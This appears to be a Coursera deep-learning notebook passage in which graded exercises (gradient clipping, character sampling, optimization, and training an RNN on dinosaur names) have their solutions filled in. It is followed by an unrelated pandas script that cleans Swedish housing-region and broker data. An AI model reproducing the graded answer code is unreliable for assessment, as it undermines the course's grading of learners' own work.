- Using the gradients, update your parameters with the gradient descent update rule.
- Return the learned parameters
<img src="images/rnn.png" style="width:450;height:300px;">
<caption><center> **Figure 1**: Recurrent Neural Network, similar to what you had built in the previous notebook "Building a Recurrent Neural Network - Step by Step". </center></caption>
* At each time-step, the RNN tries to predict what is the next character given the previous characters.
* The dataset $\mathbf{X} = (x^{\langle 1 \rangle}, x^{\langle 2 \rangle}, ..., x^{\langle T_x \rangle})$ is a list of characters in the training set.
* $\mathbf{Y} = (y^{\langle 1 \rangle}, y^{\langle 2 \rangle}, ..., y^{\langle T_x \rangle})$ is the same list of characters but shifted one character forward.
* At every time-step $t$, $y^{\langle t \rangle} = x^{\langle t+1 \rangle}$. The prediction at time $t$ is the same as the input at time $t + 1$.
## 2 - Building blocks of the model
In this part, you will build two important blocks of the overall model:
- Gradient clipping: to avoid exploding gradients
- Sampling: a technique used to generate characters
You will then apply these two functions to build the model.
### 2.1 - Clipping the gradients in the optimization loop
In this section you will implement the `clip` function that you will call inside of your optimization loop.
#### Exploding gradients
* When gradients are very large, they're called "exploding gradients."
* Exploding gradients make the training process more difficult, because the updates may be so large that they "overshoot" the optimal values during back propagation.
Recall that your overall loop structure usually consists of:
* forward pass,
* cost computation,
* backward pass,
* parameter update.
Before updating the parameters, you will perform gradient clipping to make sure that your gradients are not "exploding."
#### gradient clipping
In the exercise below, you will implement a function `clip` that takes in a dictionary of gradients and returns a clipped version of gradients if needed.
* There are different ways to clip gradients.
* We will use a simple element-wise clipping procedure, in which every element of the gradient vector is clipped to lie between some range [-N, N].
* For example, if the N=10
- The range is [-10, 10]
- If any component of the gradient vector is greater than 10, it is set to 10.
- If any component of the gradient vector is less than -10, it is set to -10.
- If any components are between -10 and 10, they keep their original values.
<img src="images/clip.png" style="width:400;height:150px;">
<caption><center> **Figure 2**: Visualization of gradient descent with and without gradient clipping, in a case where the network is running into "exploding gradient" problems. </center></caption>
**Exercise**:
Implement the function below to return the clipped gradients of your dictionary `gradients`.
* Your function takes in a maximum threshold and returns the clipped versions of the gradients.
* You can check out [numpy.clip](https://docs.scipy.org/doc/numpy-1.13.0/reference/generated/numpy.clip.html).
- You will need to use the argument "`out = ...`".
- Using the "`out`" parameter allows you to update a variable "in-place".
- If you don't use "`out`" argument, the clipped variable is stored in the variable "gradient" but does not update the gradient variables `dWax`, `dWaa`, `dWya`, `db`, `dby`.
```
### GRADED FUNCTION: clip
def clip(gradients, maxValue):
'''
Clips the gradients' values between minimum and maximum.
Arguments:
gradients -- a dictionary containing the gradients "dWaa", "dWax", "dWya", "db", "dby"
maxValue -- everything above this number is set to this number, and everything less than -maxValue is set to -maxValue
Returns:
gradients -- a dictionary with the clipped gradients.
'''
# dWaa, dWax, dWya, db, dby = gradients['dWaa'], gradients['dWax'], gradients['dWya'], gradients['db'], gradients['dby']
### START CODE HERE ###
# clip to mitigate exploding gradients, loop over [dWax, dWaa, dWya, db, dby]. (≈2 lines)
for key, gradient in gradients.items():
gradients[key] = np.clip( gradients[key], -maxValue, maxValue )
### END CODE HERE ###
# gradients = {"dWaa": dWaa, "dWax": dWax, "dWya": dWya, "db": db, "dby": dby}
return gradients
# Test with a maxvalue of 10
maxValue = 10
np.random.seed(3)
dWax = np.random.randn(5,3)*10
dWaa = np.random.randn(5,5)*10
dWya = np.random.randn(2,5)*10
db = np.random.randn(5,1)*10
dby = np.random.randn(2,1)*10
gradients = {"dWax": dWax, "dWaa": dWaa, "dWya": dWya, "db": db, "dby": dby}
gradients = clip(gradients, maxValue)
print("gradients[\"dWaa\"][1][2] =", gradients["dWaa"][1][2])
print("gradients[\"dWax\"][3][1] =", gradients["dWax"][3][1])
print("gradients[\"dWya\"][1][2] =", gradients["dWya"][1][2])
print("gradients[\"db\"][4] =", gradients["db"][4])
print("gradients[\"dby\"][1] =", gradients["dby"][1])
```
** Expected output:**
```Python
gradients["dWaa"][1][2] = 10.0
gradients["dWax"][3][1] = -10.0
gradients["dWya"][1][2] = 0.29713815361
gradients["db"][4] = [ 10.]
gradients["dby"][1] = [ 8.45833407]
```
```
# Test with a maxValue of 5
maxValue = 5
np.random.seed(3)
dWax = np.random.randn(5,3)*10
dWaa = np.random.randn(5,5)*10
dWya = np.random.randn(2,5)*10
db = np.random.randn(5,1)*10
dby = np.random.randn(2,1)*10
gradients = {"dWax": dWax, "dWaa": dWaa, "dWya": dWya, "db": db, "dby": dby}
gradients = clip(gradients, maxValue)
print("gradients[\"dWaa\"][1][2] =", gradients["dWaa"][1][2])
print("gradients[\"dWax\"][3][1] =", gradients["dWax"][3][1])
print("gradients[\"dWya\"][1][2] =", gradients["dWya"][1][2])
print("gradients[\"db\"][4] =", gradients["db"][4])
print("gradients[\"dby\"][1] =", gradients["dby"][1])
```
** Expected Output: **
```Python
gradients["dWaa"][1][2] = 5.0
gradients["dWax"][3][1] = -5.0
gradients["dWya"][1][2] = 0.29713815361
gradients["db"][4] = [ 5.]
gradients["dby"][1] = [ 5.]
```
### 2.2 - Sampling
Now assume that your model is trained. You would like to generate new text (characters). The process of generation is explained in the picture below:
<img src="images/dinos3.png" style="width:500;height:300px;">
<caption><center> **Figure 3**: In this picture, we assume the model is already trained. We pass in $x^{\langle 1\rangle} = \vec{0}$ at the first time step, and have the network sample one character at a time. </center></caption>
**Exercise**: Implement the `sample` function below to sample characters. You need to carry out 4 steps:
- **Step 1**: Input the "dummy" vector of zeros $x^{\langle 1 \rangle} = \vec{0}$.
- This is the default input before we've generated any characters.
We also set $a^{\langle 0 \rangle} = \vec{0}$
- **Step 2**: Run one step of forward propagation to get $a^{\langle 1 \rangle}$ and $\hat{y}^{\langle 1 \rangle}$. Here are the equations:
hidden state:
$$ a^{\langle t+1 \rangle} = \tanh(W_{ax} x^{\langle t+1 \rangle } + W_{aa} a^{\langle t \rangle } + b)\tag{1}$$
activation:
$$ z^{\langle t + 1 \rangle } = W_{ya} a^{\langle t + 1 \rangle } + b_y \tag{2}$$
prediction:
$$ \hat{y}^{\langle t+1 \rangle } = softmax(z^{\langle t + 1 \rangle })\tag{3}$$
- Details about $\hat{y}^{\langle t+1 \rangle }$:
- Note that $\hat{y}^{\langle t+1 \rangle }$ is a (softmax) probability vector (its entries are between 0 and 1 and sum to 1).
- $\hat{y}^{\langle t+1 \rangle}_i$ represents the probability that the character indexed by "i" is the next character.
- We have provided a `softmax()` function that you can use.
#### Additional Hints
- $x^{\langle 1 \rangle}$ is `x` in the code. When creating the one-hot vector, make a numpy array of zeros, with the number of rows equal to the number of unique characters, and the number of columns equal to one. It's a 2D and not a 1D array.
- $a^{\langle 0 \rangle}$ is `a_prev` in the code. It is a numpy array of zeros, where the number of rows is $n_{a}$, and number of columns is 1. It is a 2D array as well. $n_{a}$ is retrieved by getting the number of columns in $W_{aa}$ (the numbers need to match in order for the matrix multiplication $W_{aa}a^{\langle t \rangle}$ to work.
- [numpy.dot](https://docs.scipy.org/doc/numpy/reference/generated/numpy.dot.html)
- [numpy.tanh](https://docs.scipy.org/doc/numpy/reference/generated/numpy.tanh.html)
#### Using 2D arrays instead of 1D arrays
* You may be wondering why we emphasize that $x^{\langle 1 \rangle}$ and $a^{\langle 0 \rangle}$ are 2D arrays and not 1D vectors.
* For matrix multiplication in numpy, if we multiply a 2D matrix with a 1D vector, we end up with with a 1D array.
* This becomes a problem when we add two arrays where we expected them to have the same shape.
* When two arrays with a different number of dimensions are added together, Python "broadcasts" one across the other.
* Here is some sample code that shows the difference between using a 1D and 2D array.
```
import numpy as np
matrix1 = np.array([[1,1],[2,2],[3,3]]) # (3,2)
matrix2 = np.array([[0],[0],[0]]) # (3,1)
vector1D = np.array([1,1]) # (2,)
vector2D = np.array([[1],[1]]) # (2,1)
print("matrix1 \n", matrix1,"\n")
print("matrix2 \n", matrix2,"\n")
print("vector1D \n", vector1D,"\n")
print("vector2D \n", vector2D)
print("Multiply 2D and 1D arrays: result is a 1D array\n",
np.dot(matrix1,vector1D))
print("Multiply 2D and 2D arrays: result is a 2D array\n",
np.dot(matrix1,vector2D))
print("Adding (3 x 1) vector to a (3 x 1) vector is a (3 x 1) vector\n",
"This is what we want here!\n",
np.dot(matrix1,vector2D) + matrix2)
print("Adding a (3,) vector to a (3 x 1) vector\n",
"broadcasts the 1D array across the second dimension\n",
"Not what we want here!\n",
np.dot(matrix1,vector1D) + matrix2
)
```
- **Step 3**: Sampling:
- Now that we have $y^{\langle t+1 \rangle}$, we want to select the next letter in the dinosaur name. If we select the most probable, the model will always generate the same result given a starting letter.
- To make the results more interesting, we will use np.random.choice to select a next letter that is likely, but not always the same.
- Sampling is the selection of a value from a group of values, where each value has a probability of being picked.
- Sampling allows us to generate random sequences of values.
- Pick the next character's index according to the probability distribution specified by $\hat{y}^{\langle t+1 \rangle }$.
- This means that if $\hat{y}^{\langle t+1 \rangle }_i = 0.16$, you will pick the index "i" with 16% probability.
- You can use [np.random.choice](https://docs.scipy.org/doc/numpy-1.13.0/reference/generated/numpy.random.choice.html).
Example of how to use `np.random.choice()`:
```python
np.random.seed(0)
probs = np.array([0.1, 0.0, 0.7, 0.2])
idx = np.random.choice([0, 1, 2, 3] p = probs)
```
- This means that you will pick the index (`idx`) according to the distribution:
$P(index = 0) = 0.1, P(index = 1) = 0.0, P(index = 2) = 0.7, P(index = 3) = 0.2$.
- Note that the value that's set to `p` should be set to a 1D vector.
- Also notice that $\hat{y}^{\langle t+1 \rangle}$, which is `y` in the code, is a 2D array.
##### Additional Hints
- [range](https://docs.python.org/3/library/functions.html#func-range)
- [numpy.ravel](https://docs.scipy.org/doc/numpy/reference/generated/numpy.ravel.html) takes a multi-dimensional array and returns its contents inside of a 1D vector.
```Python
arr = np.array([[1,2],[3,4]])
print("arr")
print(arr)
print("arr.ravel()")
print(arr.ravel())
```
Output:
```Python
arr
[[1 2]
[3 4]]
arr.ravel()
[1 2 3 4]
```
- Note that `append` is an "in-place" operation. In other words, don't do this:
```Python
fun_hobbies = fun_hobbies.append('learning') ## Doesn't give you what you want
```
- **Step 4**: Update to $x^{\langle t \rangle }$
- The last step to implement in `sample()` is to update the variable `x`, which currently stores $x^{\langle t \rangle }$, with the value of $x^{\langle t + 1 \rangle }$.
- You will represent $x^{\langle t + 1 \rangle }$ by creating a one-hot vector corresponding to the character that you have chosen as your prediction.
- You will then forward propagate $x^{\langle t + 1 \rangle }$ in Step 1 and keep repeating the process until you get a "\n" character, indicating that you have reached the end of the dinosaur name.
##### Additional Hints
- In order to reset `x` before setting it to the new one-hot vector, you'll want to set all the values to zero.
- You can either create a new numpy array: [numpy.zeros](https://docs.scipy.org/doc/numpy/reference/generated/numpy.zeros.html)
- Or fill all values with a single number: [numpy.ndarray.fill](https://docs.scipy.org/doc/numpy/reference/generated/numpy.ndarray.fill.html)
```
# GRADED FUNCTION: sample
def sample(parameters, char_to_ix, seed):
"""
Sample a sequence of characters according to a sequence of probability distributions output of the RNN
Arguments:
parameters -- python dictionary containing the parameters Waa, Wax, Wya, by, and b.
char_to_ix -- python dictionary mapping each character to an index.
seed -- used for grading purposes. Do not worry about it.
Returns:
indices -- a list of length n containing the indices of the sampled characters.
"""
# Retrieve parameters and relevant shapes from "parameters" dictionary
Waa, Wax, Wya, by, b = parameters['Waa'], parameters['Wax'], parameters['Wya'], parameters['by'], parameters['b']
vocab_size = by.shape[0]
n_a = Waa.shape[1]
### START CODE HERE ###
# Step 1: Create the a zero vector x that can be used as the one-hot vector
# representing the first character (initializing the sequence generation). (≈1 line)
x = np.zeros((vocab_size,1))
# Step 1': Initialize a_prev as zeros (≈1 line)
a_prev = np.zeros((n_a, 1))
# Create an empty list of indices, this is the list which will contain the list of indices of the characters to generate (≈1 line)
indices = []
# idx is the index of the one-hot vector x that is set to 1
# All other positions in x are zero.
# We will initialize idx to -1
idx = -1
# Loop over time-steps t. At each time-step:
# sample a character from a probability distribution
# and append its index (`idx`) to the list "indices".
# We'll stop if we reach 50 characters
# (which should be very unlikely with a well trained model).
# Setting the maximum number of characters helps with debugging and prevents infinite loops.
counter = 0
newline_character = char_to_ix['\n']
while (idx != newline_character and counter != 50):
# Step 2: Forward propagate x using the equations (1), (2) and (3)
a = np.tanh( np.dot(Wax, x) + np.dot(Waa, a_prev) + b )
z = np.dot( Wya, a ) + by
y = softmax( z )
# for grading purposes
np.random.seed( counter + seed )
# Step 3: Sample the index of a character within the vocabulary from the probability distribution y
# (see additional hints above)
idx = np.random.choice(vocab_size, 1, p=y.flatten() )
# Append the index to "indices"
indices.append( idx[0] )
# Step 4: Overwrite the input x with one that corresponds to the sampled index `idx`.
# (see additional hints above)
x = np.zeros((vocab_size,1))
x[idx] = 1
# Update "a_prev" to be "a"
a_prev = a
# for grading purposes
seed += 1
counter +=1
### END CODE HERE ###
if (counter == 50):
indices.append(char_to_ix['\n'])
return indices
np.random.seed(2)
_, n_a = 20, 100
Wax, Waa, Wya = np.random.randn(n_a, vocab_size), np.random.randn(n_a, n_a), np.random.randn(vocab_size, n_a)
b, by = np.random.randn(n_a, 1), np.random.randn(vocab_size, 1)
parameters = {"Wax": Wax, "Waa": Waa, "Wya": Wya, "b": b, "by": by}
indices = sample(parameters, char_to_ix, 0)
print("Sampling:")
print("list of sampled indices:\n", indices)
print("list of sampled characters:\n", [ix_to_char[i] for i in indices])
```
** Expected output:**
```Python
Sampling:
list of sampled indices:
[12, 17, 24, 14, 13, 9, 10, 22, 24, 6, 13, 11, 12, 6, 21, 15, 21, 14, 3, 2, 1, 21, 18, 24, 7, 25, 6, 25, 18, 10, 16, 2, 3, 8, 15, 12, 11, 7, 1, 12, 10, 2, 7, 7, 11, 17, 24, 12, 13, 24, 0]
list of sampled characters:
['l', 'q', 'x', 'n', 'm', 'i', 'j', 'v', 'x', 'f', 'm', 'k', 'l', 'f', 'u', 'o', 'u', 'n', 'c', 'b', 'a', 'u', 'r', 'x', 'g', 'y', 'f', 'y', 'r', 'j', 'p', 'b', 'c', 'h', 'o', 'l', 'k', 'g', 'a', 'l', 'j', 'b', 'g', 'g', 'k', 'q', 'x', 'l', 'm', 'x', '\n']
```
* Please note that over time, if there are updates to the back-end of the Coursera platform (that may update the version of numpy), the actual list of sampled indices and sampled characters may change.
* If you follow the instructions given above and get an output without errors, it's possible the routine is correct even if your output doesn't match the expected output. Submit your assignment to the grader to verify its correctness.
## 3 - Building the language model
It is time to build the character-level language model for text generation.
### 3.1 - Gradient descent
* In this section you will implement a function performing one step of stochastic gradient descent (with clipped gradients).
* You will go through the training examples one at a time, so the optimization algorithm will be stochastic gradient descent.
As a reminder, here are the steps of a common optimization loop for an RNN:
- Forward propagate through the RNN to compute the loss
- Backward propagate through time to compute the gradients of the loss with respect to the parameters
- Clip the gradients
- Update the parameters using gradient descent
**Exercise**: Implement the optimization process (one step of stochastic gradient descent).
The following functions are provided:
```python
def rnn_forward(X, Y, a_prev, parameters):
""" Performs the forward propagation through the RNN and computes the cross-entropy loss.
It returns the loss' value as well as a "cache" storing values to be used in backpropagation."""
....
return loss, cache
def rnn_backward(X, Y, parameters, cache):
""" Performs the backward propagation through time to compute the gradients of the loss with respect
to the parameters. It returns also all the hidden states."""
...
return gradients, a
def update_parameters(parameters, gradients, learning_rate):
""" Updates parameters using the Gradient Descent Update Rule."""
...
return parameters
```
Recall that you previously implemented the `clip` function:
```Python
def clip(gradients, maxValue)
"""Clips the gradients' values between minimum and maximum."""
...
return gradients
```
#### parameters
* Note that the weights and biases inside the `parameters` dictionary are being updated by the optimization, even though `parameters` is not one of the returned values of the `optimize` function. The `parameters` dictionary is passed by reference into the function, so changes to this dictionary are making changes to the `parameters` dictionary even when accessed outside of the function.
* Python dictionaries and lists are "pass by reference", which means that if you pass a dictionary into a function and modify the dictionary within the function, this changes that same dictionary (it's not a copy of the dictionary).
```
# GRADED FUNCTION: optimize
def optimize(X, Y, a_prev, parameters, learning_rate = 0.01):
"""
Execute one step of the optimization to train the model.
Arguments:
X -- list of integers, where each integer is a number that maps to a character in the vocabulary.
Y -- list of integers, exactly the same as X but shifted one index to the left.
a_prev -- previous hidden state.
parameters -- python dictionary containing:
Wax -- Weight matrix multiplying the input, numpy array of shape (n_a, n_x)
Waa -- Weight matrix multiplying the hidden state, numpy array of shape (n_a, n_a)
Wya -- Weight matrix relating the hidden-state to the output, numpy array of shape (n_y, n_a)
b -- Bias, numpy array of shape (n_a, 1)
by -- Bias relating the hidden-state to the output, numpy array of shape (n_y, 1)
learning_rate -- learning rate for the model.
Returns:
loss -- value of the loss function (cross-entropy)
gradients -- python dictionary containing:
dWax -- Gradients of input-to-hidden weights, of shape (n_a, n_x)
dWaa -- Gradients of hidden-to-hidden weights, of shape (n_a, n_a)
dWya -- Gradients of hidden-to-output weights, of shape (n_y, n_a)
db -- Gradients of bias vector, of shape (n_a, 1)
dby -- Gradients of output bias vector, of shape (n_y, 1)
a[len(X)-1] -- the last hidden state, of shape (n_a, 1)
"""
### START CODE HERE ###
# Forward propagate through time (≈1 line)
loss, cache = rnn_forward(X, Y, a_prev, parameters)
# Backpropagate through time (≈1 line)
gradients, a = rnn_backward(X, Y, parameters, cache)
# Clip your gradients between -5 (min) and 5 (max) (≈1 line)
gradients = clip(gradients, 5)
# Update parameters (≈1 line)
# parameters = update_parameters(parameters, gradients, learning_rate)
for key in parameters.keys():
parameters[key] = parameters[key] - gradients['d'+key] * learning_rate
### END CODE HERE ###
return loss, gradients, a[len(X)-1]
np.random.seed(1)
vocab_size, n_a = 27, 100
a_prev = np.random.randn(n_a, 1)
Wax, Waa, Wya = np.random.randn(n_a, vocab_size), np.random.randn(n_a, n_a), np.random.randn(vocab_size, n_a)
b, by = np.random.randn(n_a, 1), np.random.randn(vocab_size, 1)
parameters = {"Wax": Wax, "Waa": Waa, "Wya": Wya, "b": b, "by": by}
X = [12,3,5,11,22,3]
Y = [4,14,11,22,25, 26]
loss, gradients, a_last = optimize(X, Y, a_prev, parameters, learning_rate = 0.01)
print("Loss =", loss)
print("gradients[\"dWaa\"][1][2] =", gradients["dWaa"][1][2])
print("np.argmax(gradients[\"dWax\"]) =", np.argmax(gradients["dWax"]))
print("gradients[\"dWya\"][1][2] =", gradients["dWya"][1][2])
print("gradients[\"db\"][4] =", gradients["db"][4])
print("gradients[\"dby\"][1] =", gradients["dby"][1])
print("a_last[4] =", a_last[4])
```
** Expected output:**
```Python
Loss = 126.503975722
gradients["dWaa"][1][2] = 0.194709315347
np.argmax(gradients["dWax"]) = 93
gradients["dWya"][1][2] = -0.007773876032
gradients["db"][4] = [-0.06809825]
gradients["dby"][1] = [ 0.01538192]
a_last[4] = [-1.]
```
### 3.2 - Training the model
* Given the dataset of dinosaur names, we use each line of the dataset (one name) as one training example.
* Every 100 steps of stochastic gradient descent, you will sample 10 randomly chosen names to see how the algorithm is doing.
* Remember to shuffle the dataset, so that stochastic gradient descent visits the examples in random order.
**Exercise**: Follow the instructions and implement `model()`. When `examples[index]` contains one dinosaur name (string), to create an example (X, Y), you can use this:
##### Set the index `idx` into the list of examples
* Using the for-loop, walk through the shuffled list of dinosaur names in the list "examples".
* If there are 100 examples, and the for-loop increments the index to 100 onwards, think of how you would make the index cycle back to 0, so that we can continue feeding the examples into the model when j is 100, 101, etc.
* Hint: 101 divided by 100 is zero with a remainder of 1.
* `%` is the modulus operator in python.
##### Extract a single example from the list of examples
* `single_example`: use the `idx` index that you set previously to get one word from the list of examples.
##### Convert a string into a list of characters: `single_example_chars`
* `single_example_chars`: A string is a list of characters.
* You can use a list comprehension (recommended over for-loops) to generate a list of characters.
```Python
str = 'I love learning'
list_of_chars = [c for c in str]
print(list_of_chars)
```
```
['I', ' ', 'l', 'o', 'v', 'e', ' ', 'l', 'e', 'a', 'r', 'n', 'i', 'n', 'g']
```
##### Convert list of characters to a list of integers: `single_example_ix`
* Create a list that contains the index numbers associated with each character.
* Use the dictionary `char_to_ix`
* You can combine this with the list comprehension that is used to get a list of characters from a string.
* This is a separate line of code below, to help learners clarify each step in the function.
##### Create the list of input characters: `X`
* `rnn_forward` uses the `None` value as a flag to set the input vector as a zero-vector.
* Prepend the `None` value in front of the list of input characters.
* There is more than one way to prepend a value to a list. One way is to add two lists together: `['a'] + ['b']`
##### Get the integer representation of the newline character `ix_newline`
* `ix_newline`: The newline character signals the end of the dinosaur name.
- get the integer representation of the newline character `'\n'`.
- Use `char_to_ix`
##### Set the list of labels (integer representation of the characters): `Y`
* The goal is to train the RNN to predict the next letter in the name, so the labels are the list of characters that are one time step ahead of the characters in the input `X`.
- For example, `Y[0]` contains the same value as `X[1]`
* The RNN should predict a newline at the last letter so add ix_newline to the end of the labels.
- Append the integer representation of the newline character to the end of `Y`.
- Note that `append` is an in-place operation.
- It might be easier for you to add two lists together.
```
# GRADED FUNCTION: model
def model(data, ix_to_char, char_to_ix, num_iterations = 35000, n_a = 50, dino_names = 7, vocab_size = 27):
"""
Trains the model and generates dinosaur names.
Arguments:
data -- text corpus
ix_to_char -- dictionary that maps the index to a character
char_to_ix -- dictionary that maps a character to an index
num_iterations -- number of iterations to train the model for
n_a -- number of units of the RNN cell
dino_names -- number of dinosaur names you want to sample at each iteration.
vocab_size -- number of unique characters found in the text (size of the vocabulary)
Returns:
parameters -- learned parameters
"""
# Retrieve n_x and n_y from vocab_size
n_x, n_y = vocab_size, vocab_size
# Initialize parameters
parameters = initialize_parameters(n_a, n_x, n_y)
# Initialize loss (this is required because we want to smooth our loss)
loss = get_initial_loss(vocab_size, dino_names)
# Build list of all dinosaur names (training examples).
with open("dinos.txt") as f:
examples = f.readlines()
examples = [x.lower().strip() for x in examples]
# Shuffle list of all dinosaur names
np.random.seed(0)
np.random.shuffle(examples)
# Initialize the hidden state of your LSTM
a_prev = np.zeros((n_a, 1))
# Optimization loop
for j in range(num_iterations):
### START CODE HERE ###
# Set the index `idx` (see instructions above)
idx = j % len(examples)
# Set the input X (see instructions above)
single_example = examples[idx]
single_example_chars = list(single_example)
single_example_ix = [ char_to_ix[char] for char in single_example_chars ]
X = [None] + single_example_ix
# Set the labels Y (see instructions above)
ix_newline = char_to_ix['\n']
Y = X[1:] + [ix_newline]
# Perform one optimization step: Forward-prop -> Backward-prop -> Clip -> Update parameters
# Choose a learning rate of 0.01
curr_loss, gradients, a_prev = optimize(X, Y, a_prev, parameters, learning_rate = 0.01)
### END CODE HERE ###
# Use a latency trick to keep the loss smooth. It happens here to accelerate the training.
loss = smooth(loss, curr_loss)
# Every 2000 Iteration, generate "n" characters thanks to sample() to check if the model is learning properly
if j % 2000 == 0:
print('Iteration: %d, Loss: %f' % (j, loss) + '\n')
# The number of dinosaur names to print
seed = 0
for name in range(dino_names):
# Sample indices and print them
sampled_indices = sample(parameters, char_to_ix, seed)
print_sample(sampled_indices, ix_to_char)
seed += 1 # To get the same result (for grading purposes), increment the seed by one.
print('\n')
return parameters
```
Run the following cell, you should observe your model outputting random-looking characters at the first iteration. After a few thousand iterations, your model should learn to generate reasonable-looking names.
```
parameters = model(data, ix_to_char, char_to_ix)
```
** Expected Output**
The output of your model may look different, but it will look something like this:
```Python
Iteration: 34000, Loss: 22.447230
Onyxipaledisons
Kiabaeropa
Lussiamang
Pacaeptabalsaurus
Xosalong
Eiacoteg
Troia
```
## Conclusion
You can see that your algorithm has started to generate plausible dinosaur names towards the end of the training. At first, it was generating random characters, but towards the end you could see dinosaur names with cool endings. Feel free to run the algorithm even longer and play with hyperparameters to see if you can get even better results. Our implementation generated some really cool names like `maconucon`, `marloralus` and `macingsersaurus`. Your model hopefully also learned that dinosaur names tend to end in `saurus`, `don`, `aura`, `tor`, etc.
If your model generates some non-cool names, don't blame the model entirely--not all actual dinosaur names sound cool. (For example, `dromaeosauroides` is an actual dinosaur name and is in the training set.) But this model should give you a set of candidates from which you can pick the coolest!
This assignment had used a relatively small dataset, so that you could train an RNN quickly on a CPU. Training a model of the english language requires a much bigger dataset, and usually needs much more computation, and could run for many hours on GPUs. We ran our dinosaur name for quite some time, and so far our favorite name is the great, undefeatable, and fierce: Mangosaurus!
<img src="images/mangosaurus.jpeg" style="width:250;height:300px;">
## 4 - Writing like Shakespeare
The rest of this notebook is optional and is not graded, but we hope you'll do it anyway since it's quite fun and informative.
A similar (but more complicated) task is to generate Shakespeare poems. Instead of learning from a dataset of Dinosaur names you can use a collection of Shakespearian poems. Using LSTM cells, you can learn longer term dependencies that span many characters in the text--e.g., where a character appearing somewhere a sequence can influence what should be a different character much much later in the sequence. These long term dependencies were less important with dinosaur names, since the names were quite short.
<img src="images/shakespeare.jpg" style="width:500;height:400px;">
<caption><center> Let's become poets! </center></caption>
We have implemented a Shakespeare poem generator with Keras. Run the following cell to load the required packages and models. This may take a few minutes.
```
from __future__ import print_function
from keras.callbacks import LambdaCallback
from keras.models import Model, load_model, Sequential
from keras.layers import Dense, Activation, Dropout, Input, Masking
from keras.layers import LSTM
from keras.utils.data_utils import get_file
from keras.preprocessing.sequence import pad_sequences
from shakespeare_utils import *
import sys
import io
```
To save you some time, we have already trained a model for ~1000 epochs on a collection of Shakespearian poems called [*"The Sonnets"*](shakespeare.txt).
Let's train the model for one more epoch. When it finishes training for an epoch---this will also take a few minutes---you can run `generate_output`, which will prompt asking you for an input (`<`40 characters). The poem will start with your sentence, and our RNN-Shakespeare will complete the rest of the poem for you! For example, try "Forsooth this maketh no sense " (don't enter the quotation marks). Depending on whether you include the space at the end, your results might also differ--try it both ways, and try other inputs as well.
```
print_callback = LambdaCallback(on_epoch_end=on_epoch_end)
model.fit(x, y, batch_size=128, epochs=1, callbacks=[print_callback])
# Run this cell to try with different inputs without having to re-train the model
generate_output()
```
The RNN-Shakespeare model is very similar to the one you have built for dinosaur names. The only major differences are:
- LSTMs instead of the basic RNN to capture longer-range dependencies
- The model is a deeper, stacked LSTM model (2 layer)
- Using Keras instead of python to simplify the code
If you want to learn more, you can also check out the Keras Team's text generation implementation on GitHub: https://github.com/keras-team/keras/blob/master/examples/lstm_text_generation.py.
Congratulations on finishing this notebook!
**References**:
- This exercise took inspiration from Andrej Karpathy's implementation: https://gist.github.com/karpathy/d4dee566867f8291f086. To learn more about text generation, also check out Karpathy's [blog post](http://karpathy.github.io/2015/05/21/rnn-effectiveness/).
- For the Shakespearian poem generator, our implementation was based on the implementation of an LSTM text generator by the Keras team: https://github.com/keras-team/keras/blob/master/examples/lstm_text_generation.py
| github_jupyter |
```
import pandas as pd
import numpy as np
df = pd.read_csv('../data/houses/hemnet-190221.csv')
df.head()
df.house_type.value_counts()
# CLEAN THE REGION
df['region'] = df['region'].str.upper()
df['region'] = np.where(df['region'].str.contains("VIBY"), "VIBY", df['region'])
df['region'] = np.where(df['region'].str.contains("NORRVIKEN"), "NORRVIKEN", df['region'])
df['region'] = np.where(df['region'].str.contains("TÖJNAN"), "TÖJNAN", df['region'])
df['region'] = np.where(df['region'].str.contains("HELENELUND"), "HELENELUND", df['region'])
df['region'] = np.where(df['region'].str.contains("EDSVIKEN"), "EDSVIKEN", df['region'])
df['region'] = np.where(df['region'].str.contains("ROTEBRO"), "ROTEBRO", df['region'])
df['region'] = np.where(df['region'].str.contains("HÄGGVIK"), "HÄGGVIK", df['region'])
df['region'] = np.where(df['region'].str.contains("FÅGELSÅNGEN"), "FÅGELSÅNGEN", df['region'])
df['region'] = np.where(df['region'].str.contains("SILVERDAL"), "SILVERDAL", df['region'])
df['region'] = np.where(df['region'].str.contains("SJÖBERG"), "SJÖBERG", df['region'])
df['region'] = np.where(df['region'].str.contains("TEGELHAGEN"), "TEGELHAGEN", df['region'])
df['region'] = np.where(df['region'].str.contains("TÖRNSKOGEN"), "TÖRNSKOGEN", df['region'])
df['region'] = np.where(df['region'].str.contains("ROTSUNDA"), "ROTEBRO", df['region'])
df['region'] = np.where(df['region'].str.contains("KÄRRDAL"), "KÄRRDAL", df['region'])
df['region'] = np.where(df['region'].str.contains("TUREBERG"), "TUREBERG", df['region'])
df['region'] = np.where(df['region'].str.contains("CENTRALA SOLLENTUNA"), "TUREBERG", df['region'])
df['region'] = np.where(df['region'].str.contains("SOLLENTUNA CENTRUM"), "TUREBERG", df['region'])
df['region'] = np.where(df['region'].str.contains("LANDSNORA"), "LANDSNORA", df['region'])
df['region'] = np.where(df['region'].str.contains("GILLBO"), "ROTEBRO", df['region'])
df['region'] = np.where(df['region'].str.contains("GILBO"), "ROTEBRO", df['region'])
df['region'] = np.where(df['region'].str.contains("GILLBERGA"), "GILLBO", df['region'])
df['region'] = np.where(df['region'].str.contains("EDSBERG"), "EDSBERG", df['region'])
df['region'] = np.where(df['region'].str.contains("EDSÄNGEN"), "EDSBERG", df['region'])
df['region'] = np.where(df['region'].str.contains("VAXMORA"), "WAXMORA", df['region'])
df['region'] = np.where(df['region'].str.contains("VÄSJÖN"), "VÄSJÖN", df['region'])
df['region'] = np.where(df['region'].str.contains("SÖDERSÄTRA"), "VÄSJÖN", df['region'])
df['region'] = np.where(df['region'].str.contains("SÖDERSÄTTRA"), "VÄSJÖN", df['region'])
df['region'] = np.where(df['region'].str.contains("EDSBACKA"), "HÄGGVIK", df['region'])
df['region'] = np.where(df['region'].str.contains("HÄSTHAGEN"), "HELENELUND", df['region'])
df.region.value_counts()
# Clean the brokers
df['broker'] = np.where(df['broker'].str.contains("Bjurfors"), "Bjurfors", df['broker'])
df['broker'] = np.where(df['broker'].str.contains("Fastighetsbyrån"), "Fastighetsbyrån", df['broker'])
df['broker'] = np.where(df['broker'].str.contains("Mäklarhuset"), "Mäklarhuset", df['broker'])
df['broker'] = np.where(df['broker'].str.contains("Notar"), "Notar", df['broker'])
df['broker'] = np.where(df['broker'].str.contains("Susanne Persson"), "Susanne Persson", df['broker'])
df['broker'] = np.where(df['broker'].str.contains("HusmanHagberg"), "HusmanHagberg", df['broker'])
